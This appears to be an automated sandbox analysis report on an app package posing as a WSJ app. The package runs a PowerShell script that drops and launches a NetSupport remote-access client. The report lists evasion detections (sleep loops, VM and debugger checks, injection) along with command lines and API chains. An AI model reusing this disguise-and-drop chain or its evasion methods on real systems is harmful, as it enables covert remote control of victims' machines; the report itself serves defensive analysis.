Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 480

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Found evaded block containing many API calls

Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\ProgramData\netsupport\client\client32.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Found evasive API chain checking for process token information

Source: C:\ProgramData\netsupport\client\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\ProgramData\netsupport\client\client32.exe

API coverage: 6.3 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_6BEC4F30

32_2_6BEC4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 1859 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 7949 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484	Thread sleep count: 1654 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276	Thread sleep count: 8173 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899888s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899776s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899664s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899552s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899440s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899312s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132	Thread sleep count: 1945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744	Thread sleep count: 2502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 882 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 480 > 30

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\ProgramData\netsupport\client\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\netsupport\client\client32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_6BEC3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6BEC3226h

32_2_6BEC3130

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	32_2_11069760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	32_2_11123690
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	32_2_11108090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	32_2_110BC0E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102CE84
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	32_2_11064EF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 25_2_00007FF9BAF53778 GetSystemInfo,

25_2_00007FF9BAF53778

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899776	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899664	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899552	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899440	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899312	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: HTCTL32.DLL.26.dr	Binary or memory string: VMware
Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: # BKiMitLJGDL9NaX+nk4vmCIjaQQ2tULiu82AWhbXS7NsVRmPmCQW0LucN/Z0BUZX
Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmCIjaQQ
Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AF_UNIXhreadWndClassHyper-V RAWL
Source: HTCTL32.DLL.26.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.26.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: powershell.exe, 0000001A.00000002.2193452131.0000023179868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1941852161.0000000005A08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.26.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.26.dr	Binary or memory string: VMWare
Source: client32.exe, 00000020.00000002.2492715812.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(Z

Source: C:\ProgramData\netsupport\client\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\netsupport\client\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

32_2_1115E3E1

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

32_2_110CF9F0

Contains functionality to dynamically determine API calls

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11029200

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_11178924 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

32_2_11178924

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,	32_2_11030A50
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	32_2_11092090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_1115E3E1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_1116A469
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_6BED28E1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_6BED87F5

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi64_2564.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7788.amsi.csv, type: OTHER

Maps a DLL or memory area into another process

Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\ProgramData\netsupport\client\client32.exe protection: readonly	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe

32_2_1102FB50

Contains functionality to execute programs as a different user

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,

32_2_110F21E0

Contains functionality to simulate keystroke presses

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,

32_2_1110F530

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

32_2_1109D240

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

32_2_1109D9C0

Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Progman
Source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr	Binary or memory string: Progman<

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	32_2_111700E5
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_11170376
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	32_2_11170419
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoA,	32_2_11167A6E
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	32_2_1116FFE3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_1116FEEE
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	32_2_1117008A
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_111703DD
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	32_2_111702B6
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	32_2_6BEE0F39
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	32_2_6BEE02AD
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	32_2_6BEE2218
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_6BEE21DC
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	32_2_6BEE2175
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: EnumSystemLocalesA,	32_2_6BEE2151
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	32_2_6BEE2089
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	32_2_6BEEDB7C
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	32_2_6BEDFAE1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	32_2_6BEE1EB8
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	32_2_6BEE1E5D
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	32_2_6BEE1DB6
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_6BEE1CC1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: GetLocaleInfoA,	32_2_6BEEDC99
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	32_2_6BEEDC56
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	32_2_6BEE1257
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	32_2_6BEE1680

Queries the volume information (name, serial number etc) of a device

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
